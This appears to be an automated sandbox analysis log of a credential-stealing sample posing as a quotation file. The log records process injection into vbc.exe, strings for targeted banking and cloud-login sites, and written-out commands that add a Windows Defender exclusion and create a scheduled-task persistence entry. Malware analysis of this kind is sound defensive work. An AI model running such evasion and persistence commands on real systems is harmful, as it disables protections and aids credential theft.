                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595841Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595077Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594853Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599452
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 599015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598795
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598576
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 598031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597479
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 597022
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596465
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596121
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 596000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 595015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 594578
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: vbc.exe, 00000007.00000002.4056435087.00000000057B6000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4055777550.0000000005418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB9548 LdrInitializeThunk,7_2_09DB9548
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"Jump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 446000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 448000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5463008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 446000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 448000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: B43008Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
